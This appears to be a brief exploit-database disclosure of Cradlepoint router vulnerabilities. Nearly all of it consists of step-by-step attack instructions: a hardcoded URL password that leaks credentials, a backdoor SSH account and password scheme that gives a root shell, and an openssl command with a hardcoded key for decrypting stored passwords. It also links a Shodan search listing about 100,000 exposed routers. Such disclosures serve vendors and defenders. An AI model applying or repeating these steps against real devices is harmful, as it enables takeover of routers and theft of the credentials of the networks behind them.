Cradlepoint Router Password Disclosure Vulnerability

2018-11-08
ID: 100148
CVE: None
Download vulnerable application: None
Cradlepoint Router Password Disclosure
 Many vulnerabilities in the built-in software of the Cradlepoint Router. 100000 such routers can be seen in the shodan (https://www.shodan.io/search?query=cradlepointhttpservice). These vulnerabilities were reported to Cradlepoint in august.
 A hardcoded password allows you to retrieve sensitive information, including the default password:
* go to http://[router IP]/plt?password=W6rqCjk5ijRs6Ya5bv55
* router default password is last 8 characters of WLAN_MAC
 Escalate privileges using a backdoor account with a hardcode username and password:
1. enable ssh login
2. set control.system.techsupport_access true
3. login with ssh using u:cproot p:1415 + last 4 bytes of WLAN_MAC
4. type 'sh' to get root shell
 Passwords that are encrypted using a hardcoded key:
* for passwords in the configuration store starting with "$1" the encrypted password is all after the last "$"
* the password can be decrypted using: echo [encrypted password] | openssl enc -d -aes-256-cbc -md sha1 -base64 -nosalt -k "NGJkODg1ZGE1NDhhY2ZhY2VmYjM0MDIzZjA0M2YzNTY="
1.1.11-prod (www01)